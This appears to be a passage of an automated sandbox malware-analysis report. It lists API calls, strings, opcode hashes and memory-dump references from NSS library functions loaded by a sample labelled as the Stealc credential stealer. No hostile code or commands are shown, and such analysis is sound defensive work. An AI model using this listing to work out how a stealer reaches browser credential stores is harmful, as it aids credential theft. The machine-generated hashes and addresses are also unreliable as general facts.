                                                                                                                                                                            • Instruction ID: 60322ebca0f0a640679eea5cd4d9ff8fc92d8542c19eda71cf007a44736db1df
                                                                                                                                                                            • Opcode Fuzzy Hash: b30f5c2f28d6c18a78a8e35d9513d2719e690f923f4fafa1fa1a7a6d1a1d0ae2
                                                                                                                                                                            • Instruction Fuzzy Hash: 3191E6F4A043455BEF208F249E81B9A3BA49F553CCF184960EC75ABB42E731D916C7B2
                                                                                                                                                                            APIs
                                                                                                                                                                            • PR_NewLock.NSS3 ref: 6C881DA3
                                                                                                                                                                              • Part of subcall function 6C9598D0: calloc.MOZGLUE(00000001,00000084,6C880936,00000001,?,6C88102C), ref: 6C9598E5
                                                                                                                                                                            • PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6C881DB2
                                                                                                                                                                              • Part of subcall function 6C881240: TlsGetValue.KERNEL32(00000040,?,6C88116C,NSPR_LOG_MODULES), ref: 6C881267
                                                                                                                                                                              • Part of subcall function 6C881240: EnterCriticalSection.KERNEL32(?,?,?,6C88116C,NSPR_LOG_MODULES), ref: 6C88127C
                                                                                                                                                                              • Part of subcall function 6C881240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C88116C,NSPR_LOG_MODULES), ref: 6C881291
                                                                                                                                                                              • Part of subcall function 6C881240: PR_Unlock.NSS3(?,?,?,?,6C88116C,NSPR_LOG_MODULES), ref: 6C8812A0
                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C881DD8
                                                                                                                                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6C881E4F
                                                                                                                                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6C881EA4
                                                                                                                                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6C881ECD
                                                                                                                                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6C881EEF
                                                                                                                                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6C881F17
                                                                                                                                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C881F34
                                                                                                                                                                            • PR_SetLogBuffering.NSS3(00004000), ref: 6C881F61
                                                                                                                                                                            • PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6C881F6E
                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C881F83
                                                                                                                                                                            • PR_SetLogFile.NSS3(00000000), ref: 6C881FA2
                                                                                                                                                                            • PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6C881FB8
                                                                                                                                                                            • OutputDebugStringA.KERNEL32(00000000), ref: 6C881FCB
                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6C881FD2
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
                                                                                                                                                                            • String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
                                                                                                                                                                            • API String ID: 2013311973-4000297177
                                                                                                                                                                            • Opcode ID: d1768627f9a00ccfb232dd85673608df6fc7277e876f97f3b4bda2ef69585c37
                                                                                                                                                                            • Instruction ID: 07adf83f0376d960de75d23d903f581d58ae8b978ede84f3fe2ac34d8142da58
                                                                                                                                                                            • Opcode Fuzzy Hash: d1768627f9a00ccfb232dd85673608df6fc7277e876f97f3b4bda2ef69585c37
                                                                                                                                                                            • Instruction Fuzzy Hash: 8251A9B1E052099BDF10DBE5DE44B9E7BB4AF15309F180928E826DBE40FB71E518CB91
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 6C81CA30: EnterCriticalSection.KERNEL32(?,?,?,6C87F9C9,?,6C87F4DA,6C87F9C9,?,?,6C84369A), ref: 6C81CA7A
                                                                                                                                                                              • Part of subcall function 6C81CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C81CB26
                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,?,?,6C82BE66), ref: 6C966E81
                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C82BE66), ref: 6C966E98
                                                                                                                                                                            • sqlite3_snprintf.NSS3(?,00000000,6C9CAAF9,?,?,?,?,?,?,6C82BE66), ref: 6C966EC9
                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C82BE66), ref: 6C966ED2
                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C82BE66), ref: 6C966EF8
                                                                                                                                                                            • sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C82BE66), ref: 6C966F1F
                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C82BE66), ref: 6C966F28
                                                                                                                                                                            • sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C82BE66), ref: 6C966F3D
                                                                                                                                                                            • memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C82BE66), ref: 6C966FA6
                                                                                                                                                                            • sqlite3_snprintf.NSS3(?,00000000,6C9CAAF9,00000000,?,?,?,?,?,?,?,6C82BE66), ref: 6C966FDB
                                                                                                                                                                            • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C82BE66), ref: 6C966FE4
                                                                                                                                                                            • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C82BE66), ref: 6C966FEF
                                                                                                                                                                            • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C82BE66), ref: 6C967014
                                                                                                                                                                            • sqlite3_free.NSS3(00000000,?,?,?,?,6C82BE66), ref: 6C96701D
                                                                                                                                                                            • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C82BE66), ref: 6C967030
                                                                                                                                                                            • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C82BE66), ref: 6C96705B
                                                                                                                                                                            • sqlite3_free.NSS3(00000000,?,?,?,?,?,6C82BE66), ref: 6C967079
                                                                                                                                                                            • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C82BE66), ref: 6C967097
                                                                                                                                                                            • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C82BE66), ref: 6C9670A0
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
                                                                                                                                                                            • String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                                                            • API String ID: 593473924-707647140
                                                                                                                                                                            • Opcode ID: 63eea5ab2f79a3f7410cb59498ed504f5bf39215f880ed07c96232ae6d128430
                                                                                                                                                                            • Instruction ID: d6d9a41c44feeb988c50b42f8530428506a611e77ebec4bd8a1aba5dd772a707
                                                                                                                                                                            • Opcode Fuzzy Hash: 63eea5ab2f79a3f7410cb59498ed504f5bf39215f880ed07c96232ae6d128430
                                                                                                                                                                            • Instruction Fuzzy Hash: 79518BB1A0411167F71196399C55FBB366A8FA2308F144A38E81197FC2FB35E51EC2E3
                                                                                                                                                                            APIs
                                                                                                                                                                            • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C8E4F51,00000000), ref: 6C8F4C50
                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C8E4F51,00000000), ref: 6C8F4C5B
                                                                                                                                                                            • PR_smprintf.NSS3(6C9CAAF9,?,0000002F,?,?,?,00000000,00000000,?,6C8E4F51,00000000), ref: 6C8F4C76
                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C8E4F51,00000000), ref: 6C8F4CAE
                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C8F4CC9
                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C8F4CF4
                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C8F4D0B
                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C8E4F51,00000000), ref: 6C8F4D5E
                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C8E4F51,00000000), ref: 6C8F4D68
                                                                                                                                                                            • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C8F4D85
                                                                                                                                                                            • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C8F4DA2
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C8F4DB9
                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6C8F4DCF
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                                                                                            • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                                                                                            • API String ID: 3756394533-2552752316
                                                                                                                                                                            • Opcode ID: 202b2edafcd0c94a0342ac8fd48724ca0dfb5e9a57def9992638886ce651b600
                                                                                                                                                                            • Instruction ID: 22b5c95689ca2cb48c18e751280308be79fc511dee451d993031a5f574da5096
                                                                                                                                                                            • Opcode Fuzzy Hash: 202b2edafcd0c94a0342ac8fd48724ca0dfb5e9a57def9992638886ce651b600
                                                                                                                                                                            • Instruction Fuzzy Hash: 9941ACB19001416BEB326F189E40ABA3A75AFD2389F194535E8264B702E735D926C7F3
                                                                                                                                                                            APIs
                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6C89DDDE
                                                                                                                                                                              • Part of subcall function 6C8F0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C8987ED,00000800,6C88EF74,00000000), ref: 6C8F1000
                                                                                                                                                                              • Part of subcall function 6C8F0FF0: PR_NewLock.NSS3(?,00000800,6C88EF74,00000000), ref: 6C8F1016
                                                                                                                                                                              • Part of subcall function 6C8F0FF0: PL_InitArenaPool.NSS3(00000000,security,6C8987ED,00000008,?,00000800,6C88EF74,00000000), ref: 6C8F102B
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6C89DDF5
                                                                                                                                                                              • Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F10F3
                                                                                                                                                                              • Part of subcall function 6C8F10C0: EnterCriticalSection.KERNEL32(?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F110C
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1141
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PR_Unlock.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1182
                                                                                                                                                                              • Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F119C
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C89DE34
                                                                                                                                                                            • PR_Now.NSS3 ref: 6C89DE93
                                                                                                                                                                            • CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6C89DE9D
                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C89DEB4
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C89DEC3
                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C89DED8
                                                                                                                                                                            • PR_smprintf.NSS3(%s%s,?,?), ref: 6C89DEF0
                                                                                                                                                                            • PR_smprintf.NSS3(6C9CAAF9,(NULL) (Validity Unknown)), ref: 6C89DF04
                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C89DF13
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C89DF22
                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6C89DF33
                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6C89DF3C
                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C89DF4B
                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6C89DF74
                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C89DF8E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
                                                                                                                                                                            • String ID: %s%s$(NULL) (Validity Unknown)${???}
                                                                                                                                                                            • API String ID: 1882561532-3437882492
                                                                                                                                                                            • Opcode ID: 632bc001d620802e8c8f6abf4069d2f242b124c8c44ebba127e2fb645759c3b2
                                                                                                                                                                            • Instruction ID: 74b5f3386c4dd7c6c7db2a431bba8626008f633eac715be3de9dc4ab093dbd12
                                                                                                                                                                            • Opcode Fuzzy Hash: 632bc001d620802e8c8f6abf4069d2f242b124c8c44ebba127e2fb645759c3b2
                                                                                                                                                                            • Instruction Fuzzy Hash: 1451F7B1E001055BDB20DF698D41AAF7AB4AF95398F144839E809EBB00E731D915CBF6
                                                                                                                                                                            APIs
                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C8D2DEC
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C8D2E00
                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C8D2E2B
                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C8D2E43
                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C8A4F1C,?,-00000001,00000000,?), ref: 6C8D2E74
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C8A4F1C,?,-00000001,00000000), ref: 6C8D2E88
                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C8D2EC6
                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C8D2EE4
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C8D2EF8
                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6C8D2F62
                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6C8D2F86
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0000001C), ref: 6C8D2F9E
                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6C8D2FCA
                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6C8D301A
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C8D302E
                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6C8D3066
                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6C8D3085
                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6C8D30EC
                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6C8D310C
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0000001C), ref: 6C8D3124
                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6C8D314C
                                                                                                                                                                              • Part of subcall function 6C8B9180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C8E379E,?,6C8B9568,00000000,?,6C8E379E,?,00000001,?), ref: 6C8B918D
                                                                                                                                                                              • Part of subcall function 6C8B9180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C8E379E,?,6C8B9568,00000000,?,6C8E379E,?,00000001,?), ref: 6C8B91A0
                                                                                                                                                                              • Part of subcall function 6C8807A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C81204A), ref: 6C8807AD
                                                                                                                                                                              • Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C81204A), ref: 6C8807CD
                                                                                                                                                                              • Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C81204A), ref: 6C8807D6
                                                                                                                                                                              • Part of subcall function 6C8807A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C81204A), ref: 6C8807E4
                                                                                                                                                                              • Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,6C81204A), ref: 6C880864
                                                                                                                                                                              • Part of subcall function 6C8807A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C880880
                                                                                                                                                                              • Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,?,6C81204A), ref: 6C8808CB
                                                                                                                                                                              • Part of subcall function 6C8807A0: TlsGetValue.KERNEL32(?,?,6C81204A), ref: 6C8808D7
                                                                                                                                                                              • Part of subcall function 6C8807A0: TlsGetValue.KERNEL32(?,?,6C81204A), ref: 6C8808FB
                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6C8D316D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3383223490-0
                                                                                                                                                                            • Opcode ID: 07bfab9ca54394037c5bc48bc538b79229f4fa29044f57ea59711f7fdd22b981
                                                                                                                                                                            • Instruction ID: 7832c983f38dfdd35531fc6c796e5748b2b78998fc6e8a83f62a34654b4d033b
                                                                                                                                                                            • Opcode Fuzzy Hash: 07bfab9ca54394037c5bc48bc538b79229f4fa29044f57ea59711f7fdd22b981
                                                                                                                                                                            • Instruction Fuzzy Hash: 7AF1BCB1D00209AFDF10EF68D984A9EBBB4BF09318F154968EC14A7711EB31ED95CB91
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 6C8D6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C8D6943
                                                                                                                                                                              • Part of subcall function 6C8D6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C8D6957
                                                                                                                                                                              • Part of subcall function 6C8D6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C8D6972
                                                                                                                                                                              • Part of subcall function 6C8D6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C8D6983
                                                                                                                                                                              • Part of subcall function 6C8D6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C8D69AA
                                                                                                                                                                              • Part of subcall function 6C8D6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C8D69BE
                                                                                                                                                                              • Part of subcall function 6C8D6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C8D69D2
                                                                                                                                                                              • Part of subcall function 6C8D6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C8D69DF
                                                                                                                                                                              • Part of subcall function 6C8D6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C8D6A5B
                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C8D6D8C
                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6C8D6DC5
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C8D6DD6
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C8D6DE7
                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C8D6E1F
                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C8D6E4B
                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C8D6E72
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C8D6EA7
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C8D6EC4
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C8D6ED5
                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6C8D6EE3
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C8D6EF4
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C8D6F08
                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6C8D6F35
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C8D6F44
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C8D6F5B
                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6C8D6F65
                                                                                                                                                                              • Part of subcall function 6C8D6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C8D781D,00000000,6C8CBE2C,?,6C8D6B1D,?,?,?,?,00000000,00000000,6C8D781D), ref: 6C8D6C40
                                                                                                                                                                              • Part of subcall function 6C8D6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C8D781D,?,6C8CBE2C,?), ref: 6C8D6C58
                                                                                                                                                                              • Part of subcall function 6C8D6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C8D781D), ref: 6C8D6C6F
                                                                                                                                                                              • Part of subcall function 6C8D6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C8D6C84
                                                                                                                                                                              • Part of subcall function 6C8D6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C8D6C96
                                                                                                                                                                              • Part of subcall function 6C8D6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C8D6CAA
                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C8D6F90
                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C8D6FC5
                                                                                                                                                                            • PK11_GetInternalKeySlot.NSS3 ref: 6C8D6FF4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
